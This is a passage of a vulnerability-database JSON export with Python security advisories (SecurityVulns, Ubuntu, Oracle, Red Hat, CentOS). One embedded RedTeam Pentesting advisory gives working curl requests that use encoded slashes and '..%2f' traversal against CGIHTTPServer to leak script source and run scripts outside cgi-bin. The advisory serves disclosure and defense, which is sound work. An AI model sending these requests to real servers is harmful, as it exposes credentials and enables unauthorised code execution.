isrpmvuln(pkg:\"python\", rpm:\"python~2.7.5~13.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:56", "bulletinFamily": "software", "cvelist": ["CVE-2014-4616", "CVE-2014-4650"], "description": "_json information leak, CGIHTTPServer unauthorized file access and code execution, lz4 integer overflow.", "edition": 1, "modified": "2014-07-14T00:00:00", "published": "2014-07-14T00:00:00", "id": "SECURITYVULNS:VULN:13867", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13867", "title": "python security vulnerabilities", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-4650"], "description": "\r\n\r\nAdvisory: Python CGIHTTPServer File Disclosure and Potential Code\r\n Execution\r\n\r\nThe CGIHTTPServer Python module does not properly handle URL-encoded\r\npath separators in URLs. 
This may enable attackers to disclose a CGI\r\nscript's source code or execute arbitrary CGI scripts in the server's\r\ndocument root.\r\n\r\nDetails\r\n=======\r\n\r\nProduct: Python CGIHTTPServer\r\nAffected Versions:\r\n 2.7 - 2.7.7,\r\n 3.2 - 3.2.4,\r\n 3.3 - 3.3.2,\r\n 3.4 - 3.4.1,\r\n 3.5 pre-release\r\nFixed Versions:\r\n 2.7 rev b4bab0788768,\r\n 3.2 rev e47422855841,\r\n 3.3 rev 5676797f3a3e,\r\n 3.4 rev 847e288d6e93,\r\n 3.5 rev f8b3bb5eb190\r\nVulnerability Type: File Disclosure, Directory Traversal, Code Execution\r\nSecurity Risk: high\r\nVendor URL: https://docs.python.org/2/library/cgihttpserver.html\r\nVendor Status: fixed version released\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-008\r\nAdvisory Status: published\r\nCVE: CVE-2014-4650\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4650\r\n\r\n\r\nIntroduction\r\n============\r\n\r\nThe CGIHTTPServer module defines a request-handler class, interface\r\ncompatible with BaseHTTPServer. BaseHTTPRequestHandler and inherits\r\nbehavior from SimpleHTTPServer. SimpleHTTPRequestHandler but can also\r\nrun CGI scripts.\r\n\r\n(from the Python documentation)\r\n\r\n\r\nMore Details\r\n============\r\n\r\nThe CGIHTTPServer module can be used to set up a simple HTTP server with\r\nCGI scripts. 
A sample server script in Python may look like the\r\nfollowing:\r\n\r\n------------------------------------------------------------------------\r\n#!/usr/bin/env python2\r\n\r\nimport CGIHTTPServer\r\nimport BaseHTTPServer\r\n\r\nif __name__ == "__main__":\r\n server = BaseHTTPServer.HTTPServer\r\n handler = CGIHTTPServer.CGIHTTPRequestHandler\r\n server_address = ("", 8000)\r\n # Note that only /cgi-bin will work:\r\n handler.cgi_directories = ["/cgi-bin", "/cgi-bin/subdir"]\r\n httpd = server(server_address, handler)\r\n httpd.serve_forever()\r\n------------------------------------------------------------------------\r\n\r\nThis server should execute any scripts located in the subdirectory\r\n"cgi-bin". A sample CGI script can be placed in that directory, for\r\nexample a script like the following:\r\n\r\n------------------------------------------------------------------------\r\n#!/usr/bin/env python2\r\nimport json\r\nimport sys\r\n\r\ndb_credentials = "SECRET"\r\nsys.stdout.write("Content-type: text/json\r\n\r\n")\r\nsys.stdout.write(json.dumps({"text": "This is a Test"}))\r\n------------------------------------------------------------------------\r\n\r\nThe Python library CGIHTTPServer.py implements the CGIHTTPRequestHandler\r\nclass which inherits from SimpleHTTPServer.SimpleHTTPRequestHandler:\r\n\r\nclass SimpleHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):\r\n[...]\r\n def do_GET(self):\r\n """Serve a GET request."""\r\n f = self.send_head()\r\n if f:\r\n try:\r\n self.copyfile(f, self.wfile)\r\n finally:\r\n f.close()\r\n\r\n def do_HEAD(self):\r\n """Serve a HEAD request."""\r\n f = self.send_head()\r\n if f:\r\n f.close()\r\n\r\n def translate_path(self, path):\r\n [...]\r\n path = posixpath.normpath(urllib.unquote(path))\r\n words = path.split('/')\r\n words = filter(None, words)\r\n path = os.getcwd()\r\n [...]\r\n\r\nThe CGIHTTPRequestHandler class inherits, among others, the methods\r\ndo_GET() and do_HEAD() for handling HTTP GET and 
HTTP HEAD requests. The\r\nclass overrides send_head() and implements several new methods, such as\r\ndo_POST(), is_cgi() and run_cgi():\r\n\r\nclass CGIHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):\r\n[...]\r\n def do_POST(self):\r\n [...]\r\n if self.is_cgi():\r\n self.run_cgi()\r\n else:\r\n self.send_error(501, "Can only POST to CGI scripts")\r\n\r\n def send_head(self):\r\n """Version of send_head that support CGI scripts"""\r\n if self.is_cgi():\r\n return self.run_cgi()\r\n else:\r\n return SimpleHTTPServer.SimpleHTTPRequestHandler.send_head(self)\r\n\r\n def is_cgi(self):\r\n [...]\r\n collapsed_path = _url_collapse_path(self.path)\r\n dir_sep = collapsed_path.find('/', 1)\r\n head, tail = collapsed_path[:dir_sep], collapsed_path[dir_sep+1:]\r\n if head in self.cgi_directories:\r\n self.cgi_info = head, tail\r\n return True\r\n return False\r\n[...]\r\n def run_cgi(self):\r\n """Execute a CGI script."""\r\n dir, rest = self.cgi_info\r\n\r\n [...]\r\n\r\n # dissect the part after the directory name into a script name &\r\n # a possible additional path, to be stored in PATH_INFO.\r\n i = rest.find('/')\r\n if i >= 0:\r\n script, rest = rest[:i], rest[i:]\r\n else:\r\n script, rest = rest, ''\r\n\r\n scriptname = dir + '/' + script\r\n scriptfile = self.translate_path(scriptname)\r\n if not os.path.exists(scriptfile):\r\n self.send_error(404, "No such CGI script (%r)" % scriptname)\r\n return\r\n if not os.path.isfile(scriptfile):\r\n self.send_error(403, "CGI script is not a plain file (%r)" %\r\n scriptname)\r\n return\r\n [...]\r\n[...]\r\n\r\nFor HTTP GET requests, do_GET() first invokes send_head(). That method\r\ncalls is_cgi() to determine whether the requested path is to be executed\r\nas a CGI script. The is_cgi() method uses _url_collapse_path() to\r\nnormalize the path, i.e. remove extraneous slashes (/),current directory\r\n(.), or parent directory (..) 
elements, taking care not to permit\r\ndirectory traversal below the document root. The is_cgi() function\r\nreturns True when the first path element is contained in the\r\ncgi_directories list. As _url_collapse_path() and is_cgi() never URL\r\ndecode the path, replacing the forward slash after the CGI directory in\r\nthe URL to a CGI script with the URL encoded variant %2f leads to\r\nis_cgi() returning False. This will make CGIHTTPRequestHandler's\r\nsend_head() then invoke its parent's send_head() method which translates\r\nthe URL path to a file system path using the translate_path() method and\r\nthen outputs the file's contents raw. As translate_path() URL decodes\r\nthe path, this then succeeds and discloses the CGI script's file\r\ncontents:\r\n\r\n$ curl http://localhost:8000/cgi-bin%2ftest.py\r\n#!/usr/bin/env python2\r\nimport json\r\nimport sys\r\n\r\ndb_credentials = "SECRET"\r\nsys.stdout.write("Content-type: text/json\r\n\r\n")\r\nsys.stdout.write(json.dumps({"text": "This is a Test"}))\r\n\r\nSimilarly, the CGIHTTPRequestHandler can be tricked into executing CGI\r\nscripts that would normally not be executable. The class normally only\r\nallows executing CGI scripts that are direct children of one of the\r\ndirectories listed in cgi_directories. Furthermore, only direct\r\nsubdirectories of the document root (the current working directory) can\r\nbe valid CGI directories.\r\n\r\nThis can be seen in the following example. Even though the sample server\r\nshown above includes "/cgi-bin/subdir" as part of the request handler's\r\ncgi_directories, a CGI script named test.py in that directory is not\r\nexecuted:\r\n\r\n$ curl http://localhost:8000/cgi-bin/subdir/test.py\r\n[...]\r\n<p>Error code 403.\r\n<p>Message: CGI script is not a plain file ('/cgi-bin/subdir').\r\n[...]\r\n\r\nHere, is_cgi() set self.cgi_info to ('/cgi-bin', 'subdir/test.py') and\r\nreturned True. 
Next, run_cgi() further dissected these paths to perform\r\nsome sanity checks, thereby mistakenly assuming subdir to be the\r\nexecutable script's filename and test.py to be path info. As subdir is\r\nnot an executable file, run_cgi() returns an error message. However, if\r\nthe forward slash between subdir and test.py is replaced with %2f,\r\ninvoking the script succeeds:\r\n\r\n$ curl http://localhost:8000/cgi-bin/subdir%2ftest.py\r\n{"text": "This is a Test"}\r\n\r\nThis is because neither is_cgi() nor run_cgi() URL decode the path\r\nduring processing until run_cgi() tries to determine whether the target\r\nscript is an executable file. More specifically, as subdir%2ftest.py\r\ndoes not contain a forward slash, it is not split into the script name\r\nsubdir and path info test.py, as in the previous example.\r\n\r\nSimilarly, using URL encoded forward slashes, executables outside of a\r\nCGI directory can be executed:\r\n\r\n$ curl http://localhost:8000/cgi-bin/..%2ftraversed.py\r\n{"text": "This is a Test"}\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nSubclass CGIHTTPRequestHandler and override the is_cgi() method with a\r\nvariant that first URL decodes the supplied path, for example:\r\n\r\nclass FixedCGIHTTPRequestHandler(CGIHTTPServer.CGIHTTPRequestHandler):\r\n def is_cgi(self):\r\n self.path = urllib.unquote(self.path)\r\n return CGIHTTPServer.CGIHTTPRequestHandler.is_cgi(self)\r\n\r\n\r\nFix\r\n===\r\n\r\nUpdate to the latest Python version from the Mercurial repository at\r\nhttp://hg.python.org/cpython/\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nThe vulnerability can be used to gain access to the contents of CGI\r\nbinaries or the source code of CGI scripts. This may reveal sensitive\r\ninformation, for example access credentials. This can greatly help\r\nattackers in mounting further attacks and is therefore considered to\r\npose a high risk. Furthermore attackers may be able to execute code that\r\nwas not intended to be executed. 
However, this is limited to files\r\nstored in the server's working directory or in its subdirectories.\r\n\r\nThe CGIHTTPServer code does contain this warning:\r\n"SECURITY WARNING: DON'T USE THIS CODE UNLESS YOU ARE INSIDE A FIREWALL"\r\nEven when used on a local computer this may allow other local users to\r\nexecute code in the context of another user.\r\n\r\n\r\nTimeline\r\n========\r\n\r\n2014-04-07 Vulnerability identified\r\n2014-06-11 Customer approved disclosure to vendor\r\n2014-06-11 Vendor notified\r\n2014-06-15 Vendor disclosed vulnerability in their public bug tracker\r\n and addressed it in public source code repository\r\n2014-06-23 CVE number requested\r\n2014-06-25 CVE number assigned\r\n2014-06-26 Advisory released\r\n\r\n\r\nReferences\r\n==========\r\n\r\nhttp://bugs.python.org/issue21766\r\n\r\n\r\nRedTeam Pentesting GmbH\r\n=======================\r\n\r\nRedTeam Pentesting offers individual penetration tests, short pentests,\r\nperformed by a team of specialised IT-security experts. Hereby, security\r\nweaknesses in company networks or products are uncovered and can be\r\nfixed immediately.\r\n\r\nAs there are only few experts in this field, RedTeam Pentesting wants to\r\nshare its knowledge and enhance the public knowledge with research in\r\nsecurity related areas. The results are made available as public\r\nsecurity advisories.\r\n\r\nMore information about RedTeam Pentesting can be found at\r\nhttps://www.redteam-pentesting.de.\r\n\r\n\r\n-- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 
25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschaftsfuhrer: Patrick Hof, Jens Liebchen\r\n\r\n", "edition": 1, "modified": "2014-10-15T00:00:00", "published": "2014-10-15T00:00:00", "id": "SECURITYVULNS:DOC:31253", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31253", "title": "[RT-SA-2014-008] Python CGIHTTPServer File Disclosure and Potential Code Execution", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:52", "bulletinFamily": "software", "cvelist": ["CVE-2013-4238"], "description": "Invalid NULL characters processing.", "edition": 1, "modified": "2013-10-02T00:00:00", "published": "2013-10-02T00:00:00", "id": "SECURITYVULNS:VULN:13303", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13303", "title": "Python SSL certificate check bypass", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "ubuntu": [{"lastseen": "2020-07-02T11:41:09", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650"], "description": "It was discovered that multiple Python protocol libraries incorrectly \nlimited certain data when connecting to servers. A malicious ftp, http, \nimap, nntp, pop or smtp server could use this issue to cause a denial of \nservice. (CVE-2013-1752)\n\nIt was discovered that the Python xmlrpc library did not limit unpacking \ngzip-compressed HTTP bodies. A malicious server could use this issue to \ncause a denial of service. (CVE-2013-1753)\n\nIt was discovered that the Python json module incorrectly handled a certain \nargument. An attacker could possibly use this issue to read arbitrary \nmemory and expose sensitive information. This issue only affected Ubuntu \n12.04 LTS and Ubuntu 14.04 LTS. 
(CVE-2014-4616)\n\nIt was discovered that the Python CGIHTTPServer incorrectly handled \nURL-encoded path separators in URLs. A remote attacker could use this issue \nto expose sensitive information, or possibly execute arbitrary code. This \nissue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-4650)\n\nIt was discovered that Python incorrectly handled sizes and offsets in \nbuffer functions. An attacker could possibly use this issue to read \narbitrary memory and obtain sensitive information. This issue only affected \nUbuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-7185)", "edition": 6, "modified": "2015-06-25T00:00:00", "published": "2015-06-25T00:00:00", "id": "USN-2653-1", "href": "https://ubuntu.com/security/notices/USN-2653-1", "title": "Python vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-09T01:32:14", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4238"], "description": "Ryan Sleevi discovered that Python did not properly handle certificates \nwith NULL characters in the Subject Alternative Name field. 
An attacker \ncould exploit this to perform a man in the middle attack to view sensitive \ninformation or alter encrypted communications.", "edition": 5, "modified": "2013-10-01T00:00:00", "published": "2013-10-01T00:00:00", "id": "USN-1982-1", "href": "https://ubuntu.com/security/notices/USN-1982-1", "title": "Python 2.6 vulnerability", "type": "ubuntu", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "oraclelinux": [{"lastseen": "2020-02-27T14:37:55", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650"], "description": "[2.7.5-34.0.1]\n- Add Oracle Linux distribution in platform.py [orabug 20812544]\n[2.7.5-34]\n- Revert fix for rhbz#1117751 as it leads to regressions\nResolves: rhbz#1117751\n[2.7.5-33]\n- Only restore SIG_PIPE when Popen called with restore_sigpipe\nResolves: rhbz#1117751\n[2.7.5-32]\n- Backport SSLSocket.version function\n- Temporary disable test_gdb on ppc64le rhbz#1260558\nResolves: rhbz#1259421\n[2.7.5-31]\n- Update load_cert_chain function to accept None keyfile\nResolves: rhbz#1250611\n[2.7.5-30]\n- Change Patch224 according to latest update in PEP493\nResolves:rhbz#1219108\n[2.7.5-29]\n- Popen shouldn't ignore SIG_PIPE\nResolves: rhbz#1117751\n[2.7.5-28]\n- Exclude python subprocess temp files from cleaning\nResolves: rhbz#1058482\n[2.7.5-27]\n- Add list for cprofile sort option\nResolves:rhbz#1237107\n[2.7.5-26]\n- Add switch to toggle cert verification on or off globally\nResolves:rhbz#1219108\n[2.7.5-25]\n- PEP476 enable cert verifications by default\nResolves:rhbz#1219110\n[2.7.5-24]\n- Massive backport of ssl module from python3 aka PEP466\nResolves: rhbz#1111461\n[2.7.5-23]\n- Fixed CVE-2013-1753, CVE-2013-1752, CVE-2014-4616, CVE-2014-4650, CVE-2014-7185\nResolves: rhbz#1206574\n[2.7.5-22]\n- Fix importing readline producing erroneous output\nResolves: rhbz#1189301\n[2.7.5-21]\n- Add missing import in bdist_rpm\nResolves: 
rhbz#1177613\n[2.7.5-20]\n- Avoid double close of subprocess pipes\nResolves: rhbz#1103452\n[2.7.5-19]\n- make multiprocessing ignore EINTR\nResolves: rhbz#1181624", "edition": 5, "modified": "2015-11-23T00:00:00", "published": "2015-11-23T00:00:00", "id": "ELSA-2015-2101", "href": "http://linux.oracle.com/errata/ELSA-2015-2101.html", "title": "python security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:33", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1753", "CVE-2014-1912", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650"], "description": "python27\n[1.1-17]\n- Require python-pip and python-wheel (note: in rh-python34\n this is not necessary, because 'python' depends on these).\npython27-python\n[2.7.8-3]\n- Add httplib fix for CVE-2013-1752\nResolves: rhbz#1187779\n[2.7.8-2]\n- Fix %check\nunset DISPLAY\n setion not failing properly on failed test\n- Fixed CVE-2013-1752, CVE-2013-1753\nResolves: rhbz#1187779\n[2.7.8-1]\n- Update to 2.7.8.\nResolves: rhbz#1167912\n- Make python-devel depend on scl-utils-build.\nResolves: rhbz#1170993\npython27-python-pip\n - New Package added\npython27-python-setuptools\n[0.9.8-3]\n- Enhance patch restoring proxy support in SSL connections\nResolves: rhbz#1222507\npython27-python-simplejson\n[3.2.0-2]\n- Fix CVE-2014-461, add boundary checks\nResolves: rhbz#1222534\npython27-python-wheel\n - New Package added ", "edition": 4, "modified": "2016-02-04T00:00:00", "published": "2016-02-04T00:00:00", "id": "ELSA-2015-1064", "href": "http://linux.oracle.com/errata/ELSA-2015-1064.html", "title": "python27 security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:39:34", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4238"], "description": "[2.6.6-51]\n- Fixed memory leak in 
_ssl._get_peer_alt_names\nResolves: rhbz#1002983\n[2.6.6-50]\n- Added fix for CVE-2013-4238\nResolves: rhbz#998784\n[2.6.6-49]\n- Fix shebangs in several files in python-tools subpackage\nResolves: rhbz#521898\n[2.6.6-48]\n- Fix sqlite3.Cursor.lastrowid under a Turkish locale.\nResolves: rhbz#841937\n[2.6.6-47]\n- Urlparse now parses query and fragment of urls for any scheme.\nResolves: rhbz#978129\n[2.6.6-46]\n- Add wrapper for select.select to restart a system call\nResolves: rhbz#948025\n[2.6.6-45]\n- Add try-except to catch OSError in WatchedFileHandler\nResolves: rhbz#919163\n[2.6.6-44]\n- Fix urandom to throw proper exception\nResolves: rhbz#893034\n[2.6.6-43]\n- Backport of collections.OrderedDict from Python 2.7\nResolves: rhbz#929258\n[2.6.6-42]\n- Add an explicit RPATH to _elementtree.so pointing at the directory\ncontaining system expat\nResolves: rhbz#962779\n[2.6.6-41]\n- Don't let failed incoming SSL connection stay open forever\nResolves: rhbz#960168\n[2.6.6-40]\n- Fix Python not reading Alternative Subject Names from some SSL\ncertificates\nResolves: rhbz#928390\n[2.6.6-39]\n- Remove BOM insertion code from SysLogHandler that causes messages to be\ntreated as EMERG level\nResolves: rhbz#845802\n[2.6.6-38]\n- move most of the payload of the core package to the libs subpackage, given\nthat the libs aren't meaningfully usable without the standard libraries\n- preserve timestamps when fixing shebangs (patch 158) and when installing,\nto minimize .pyc/.pyo differences across architectures (due to the embedded\nmtime in .pyc/.pyo headers)\n- fix multilib issue in /usr/bin/modulator and /usr/bin/pynche\nRelated: rhbz#958256", "edition": 4, "modified": "2013-11-26T00:00:00", "published": "2013-11-26T00:00:00", "id": "ELSA-2013-1582", "href": "http://linux.oracle.com/errata/ELSA-2013-1582.html", "title": "python security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "redhat": 
[{"lastseen": "2019-08-13T18:45:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1752", "CVE-2013-1753", "CVE-2014-1912", "CVE-2014-4616", "CVE-2014-4650", "CVE-2014-7185"], "description": "Python is an interpreted, interactive, object-oriented programming language\nthat supports modules, classes, exceptions, high-level dynamic data types,\nand dynamic typing. The python27 collection provide a stable release of\nPython 2.7 with a number of additional utilities and database connectors\nfor MySQL and PostgreSQL.\n\nThe python27-python packages have been upgraded to upstream version 2.7.8,\nwhich provides numerous bug fixes over the previous version. (BZ#1167912)\n\nThe following security issues were fixed in the python27-python component:\n\nIt was discovered that the socket.recvfrom_into() function failed to check\nthe size of the supplied buffer. This could lead to a buffer overflow when\nthe function was called with an insufficiently sized buffer.\n(CVE-2014-1912)\n\nIt was discovered that the Python xmlrpclib module did not restrict the\nsize of gzip-compressed HTTP responses. A malicious XMLRPC server could\ncause an XMLRPC client using xmlrpclib to consume an excessive amount of\nmemory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause a\nclient using one of the affected modules to consume an excessive amount of\nmemory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL\nencoded paths. A remote attacker could use this flaw to execute scripts\noutside of the cgi-bin directory, or disclose the source code of the\nscripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled\nits offset and size arguments. 
An attacker able to control these arguments\ncould use this flaw to disclose portions of the application memory or cause\nit to crash. (CVE-2014-7185)\n\nThe following security issue was fixed in the python27-python and\npython27-python-simplejson components:\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An attacker\nable to control the index value passed to one of the affected functions\ncould possibly use this flaw to disclose portions of the application\nmemory. (CVE-2014-4616)\n\nIn addition, this update adds the following enhancement:\n\n* The python27 Software Collection now includes the python-wheel and\npython-pip modules. (BZ#994189, BZ#1167902)\n\nAll python27 users are advised to upgrade to these updated packages, which\ncorrect these issues and add these enhancements. All running python27\ninstances must be restarted for this update to take effect.\n", "modified": "2018-06-13T01:28:19", "published": "2015-06-04T04:00:00", "id": "RHSA-2015:1064", "href": "https://access.redhat.com/errata/RHSA-2015:1064", "type": "redhat", "title": "(RHSA-2015:1064) Moderate: python27 security, bug fix, and enhancement update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-27T11:34:32", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1752", "CVE-2013-1753", "CVE-2014-4616", "CVE-2014-4650", "CVE-2014-7185", "CVE-2014-9365"], "description": "Python is an interpreted, interactive, object-oriented programming language\noften compared to Tcl, Perl, Scheme, or Java. Python includes modules,\nclasses, exceptions, very high level dynamic data types and dynamic typing.\nPython supports interfaces to many system calls and libraries, as well as\nto various windowing systems (X11, Motif, Tk, Mac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict the\nsize of gzip-compressed HTTP responses. 
A malicious XMLRPC server could\ncause an XMLRPC client using xmlrpclib to consume an excessive amount of\nmemory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause a\nclient using one of the affected modules to consume an excessive amount of\nmemory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL\nencoded paths. A remote attacker could use this flaw to execute scripts\noutside of the cgi-bin directory, or disclose the source code of the\nscripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled\nits offset and size arguments. An attacker able to control these arguments\ncould use this flaw to disclose portions of the application memory or cause\nit to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An attacker\nable to control the index value passed to one of the affected functions\ncould possibly use this flaw to disclose portions of the application\nmemory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or urllib)\ndid not perform verification of TLS/SSL certificates when connecting to\nHTTPS servers. A man-in-the-middle attacker could use this flaw to hijack\nconnections and eavesdrop or modify transferred data. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to enable\ncertificate verification by default. However, for backwards compatibility,\nverification remains disabled by default. Future updates may change this\ndefault. Refer to the Knowledgebase article 2039753 linked to in the\nReferences section for further details about this change. 
(BZ#1219108)\n\nThis update also fixes the following bugs:\n\n* Subprocesses used with the Eventlet library or regular threads previously\ntried to close epoll file descriptors twice, which led to an \"Invalid\nargument\" error. Subprocesses have been fixed to close the file descriptors\nonly once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no longer\nproduces erroneous random characters on stdout. (BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the \"-s\"\noption supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts \"None\" as a keyfile argument.\n(BZ#1250611)\n\nIn addition, this update adds the following enhancements:\n\n* Security enhancements as described in PEP 466 have been backported to the\nPython standard library, for example, new features of the ssl module:\nServer Name Indication (SNI) support, support for new TLSv1.x protocols,\nnew hash algorithms in the hashlib module, and many more. (BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the ssl\nlibrary. (BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access information\nabout the version of the SSL protocol used in a connection. 
(BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues and add these\nenhancements.", "modified": "2018-04-12T03:32:44", "published": "2015-11-19T18:41:01", "id": "RHSA-2015:2101", "href": "https://access.redhat.com/errata/RHSA-2015:2101", "type": "redhat", "title": "(RHSA-2015:2101) Moderate: python security, bug fix, and enhancement update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:57", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4238"], "description": "Python is an interpreted, interactive, object-oriented programming\nlanguage.\n\nA flaw was found in the way the Python SSL module handled X.509 certificate\nfields that contain a NULL byte. An attacker could potentially exploit this\nflaw to conduct man-in-the-middle attacks to spoof SSL servers. Note that\nto exploit this issue, an attacker would need to obtain a carefully crafted\ncertificate signed by an authority that the client trusts. (CVE-2013-4238)\n\nThese updated python packages include numerous bug fixes and one\nenhancement. Space precludes documenting all of these changes in this\nadvisory. 
Users are directed to the Red Hat Enterprise Linux 6.5 Technical\nNotes, linked to in the References, for information on the most significant\nof these changes.\n\nAll users of python are advised to upgrade to these updated packages, which\nfix these issues and add this enhancement.\n", "modified": "2018-06-06T20:24:26", "published": "2013-11-21T05:00:00", "id": "RHSA-2013:1582", "href": "https://access.redhat.com/errata/RHSA-2013:1582", "type": "redhat", "title": "(RHSA-2013:1582) Moderate: python security, bug fix, and enhancement update", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "centos": [{"lastseen": "2020-02-27T14:39:33", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650", "CVE-2014-9365"], "description": "**CentOS Errata and Security Advisory** CESA-2015:2101\n\n\nPython is an interpreted, interactive, object-oriented programming language\noften compared to Tcl, Perl, Scheme, or Java. Python includes modules,\nclasses, exceptions, very high level dynamic data types and dynamic typing.\nPython supports interfaces to many system calls and libraries, as well as\nto various windowing systems (X11, Motif, Tk, Mac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict the\nsize of gzip-compressed HTTP responses. A malicious XMLRPC server could\ncause an XMLRPC client using xmlrpclib to consume an excessive amount of\nmemory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause a\nclient using one of the affected modules to consume an excessive amount of\nmemory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL\nencoded paths. 
A remote attacker could use this flaw to execute scripts\noutside of the cgi-bin directory, or disclose the source code of the\nscripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled\nits offset and size arguments. An attacker able to control these arguments\ncould use this flaw to disclose portions of the application memory or cause\nit to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An attacker\nable to control the index value passed to one of the affected functions\ncould possibly use this flaw to disclose portions of the application\nmemory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or urllib)\ndid not perform verification of TLS/SSL certificates when connecting to\nHTTPS servers. A man-in-the-middle attacker could use this flaw to hijack\nconnections and eavesdrop or modify transferred data. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to enable\ncertificate verification by default. However, for backwards compatibility,\nverification remains disabled by default. Future updates may change this\ndefault. Refer to the Knowledgebase article 2039753 linked to in the\nReferences section for further details about this change. (BZ#1219108)\n\nThis update also fixes the following bugs:\n\n* Subprocesses used with the Eventlet library or regular threads previously\ntried to close epoll file descriptors twice, which led to an \"Invalid\nargument\" error. Subprocesses have been fixed to close the file descriptors\nonly once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no longer\nproduces erroneous random characters on stdout. 
